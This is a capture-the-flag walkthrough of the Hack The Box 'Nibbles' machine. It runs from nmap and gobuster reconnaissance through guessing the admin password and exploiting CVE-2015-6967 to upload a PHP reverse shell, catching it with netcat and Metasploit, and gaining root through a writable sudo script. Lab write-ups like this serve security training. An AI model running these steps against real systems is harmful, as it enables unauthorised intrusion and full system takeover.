Nibbles

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.75  

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.75  

Not shown: 1000 closed udp ports (port-unreach)

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.75

We get back the following result showing that two ports are open:

Port 80: running Apache httpd 2.4.18
Port 22: running OpenSSH 7.2p2

Enumeration: Website - Port 80

Nothing useful there, so right click and select View Page Source. We find a comment that gives us a new directory. CTRL + U

This leads us to the following page. You can see at the bottom that it is powered by Nibbleblog. This is an indication that it an off the shelf software as apposed to custom software.

Gobuster:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.75/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.75/nibbleblog

/index.php            (Status: 200) [Size: 2987]
/sitemap.php          (Status: 200) [Size: 402]
/.php                 (Status: 403) [Size: 301]
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/feed.php             (Status: 200) [Size: 302]
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php          (Status: 200) [Size: 78]
/update.php           (Status: 200) [Size: 1622]
/README               (Status: 200) [Size: 4628]
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
/LICENSE.txt          (Status: 200) [Size: 35148]
/COPYRIGHT.txt        (Status: 200)

Identifying a username

Digging deeper, there’s a page at /nibbleblog/content/private/users.xml which reveals a user, admin, as well as the IPs that have tried to log in as it:

http://10.10.10.75/nibbleblog/update.php DB updated: ./content/private/config.xml DB updated: ./content/private/comments.xml

http://10.10.10.75/nibbleblog/README Version: v4.0.3 ===== About the author ===== Name: Diego Najar E-mail: dignajar@gmail.com Linkedin: http://www.linkedin.com/in/dignajar

http://10.10.10.75/nibbleblog/content/private/config.xml <notification_email_to type="string">admin@nibbles.com</notification_email_to> <notification_email_fromtype="string">noreply@10.10.10.134</notification_email_from>

http://10.10.10.75/nibbleblog/content/private/users.xml
<users>
<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">2</session_fail_count>
<session_date type="integer">1703672877</session_date>
</user>
<blacklist type="string" ip="10.10.10.1">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
</blacklist>
<blacklist type="string" ip="10.10.16.4">
<date type="integer">1703672861</date>
<fail_count type="integer">2</fail_count>
</blacklist>
</users>

Logging into admin panel

I wasn’t able to locate a password elsewhere on the blog, and nibbleblog doesn’t have a default password. Luckily, the guess of nibbles worked, and we are in:

Remote Code Execution (via file upload):

From the gobuster results, there’s a README file, and that gives us a version:

http://10.10.10.75/nibbleblog/README Version: v4.0.3

This version of nibbleblog is vulnerable to CVE-2015-6967, which is an authenticated arbitrary file upload, which can lead to code execution. There’s both a metasploit modules, and it’s pretty straightforwards to do manually.

CVE-2015-6967:

Now we need admin credentials. When I’m presented with an enter credentials page, the first thing I try is common credentials (admin/admin, admin/nibbles, nibbles/nibbles, nibbles/admin). If that doesn’t work out, I look for default credentials online that are specific to the technology. Last, I use a password cracker if all else fails.

Next, we need to navigate to the My Image plugin. Click on Plugins > My image > Configure.

Get the code for a PHP reverse shell. Change the IP address and port used by your attack machine. Then save it in a file called image.php and upload it on the site.

Start a listener on the above chosen port.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555

In the browser, navigate to the image we just uploaded to run the reverse shell script.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.75] 57330

Let’s first upgrade to a better shell. Python is not installed but python 3 is.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Metasploit –> Meterpreter

We’ll use multi/http/nibbleblog_file_upload to get a shell on the box.

┌──(kali💀kali)-[~]
└─$ msfconsole

msf6 > use multi/http/nibbleblog_file_upload
msf6 exploit(multi/http/nibbleblog_file_upload) > info
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.16.4
msf6 exploit(multi/http/nibbleblog_file_upload) > run

meterpreter > shell
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

user.txt:

From there, we’ll upgrade our shell, and then get user.txt:

python3 -c 'import pty;pty.spawn("/bin/bash")'
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home
nibbler@Nibbles:/home$ cd nibbler
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
455db----------------------------------

Privilege Escalation

Find out what privileges you have. Either through running LinEnum.sh or just by checking sudo -l, we’ll see the following:

nibbler@Nibbles:/home/nibbler$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

But if we go and try to access it we will find that the personal directory does not exist! But that's not the end we can still create it and use it:

cd /home/nibbler
mkdir personal
mkdir stuff
cd /home/nibbler/personal/stuff

okay now we have the directories ready, lets create our script, nano does not exist, we will need to use vi text editor:

nibbler@Nibbles:/home/nibbler/personal/stuff$ vi monitor.sh

when the vi is open, press i and enter, then paste this shell:

#!/bin/sh
bash

then press ESC from your keyboard, and type :wq to save and exit then press enter:

nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
#!/bin/sh
bash

Okay our script is ready, the last thing to do is giving it execution permissions:

nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh

then:

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh

root@Nibbles:/home/nibbler/personal/stuff# whoami
whoami
root

root@Nibbles:/home# cat /root/root.txt
cat /root/root.txt
8ece72-----------------------------

PreviousBashed Writeup NextTabby

Last updated 1 year ago